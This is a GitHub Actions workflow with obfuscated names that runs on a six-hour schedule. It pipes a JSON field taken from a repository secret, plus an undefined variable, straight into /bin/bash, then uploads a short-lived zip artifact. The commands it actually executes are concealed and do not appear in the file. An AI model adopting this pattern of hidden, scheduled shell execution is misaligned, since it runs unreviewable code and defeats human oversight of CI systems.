name: shilifeiyi
on:
  workflow_dispatch:

  schedule:
    - cron: '39 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shilifeiyi
        env:
          bog6869: ${{ secrets.bog6869 }}
        run: |
          printf '%s' "$bog6869" | jq -r .e63003 | /bin/bash
          printf '%s' "$bpo79101" | jq -r .h96512 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: VLSsSyaE
          path: "*.zip"
          retention-days: 1
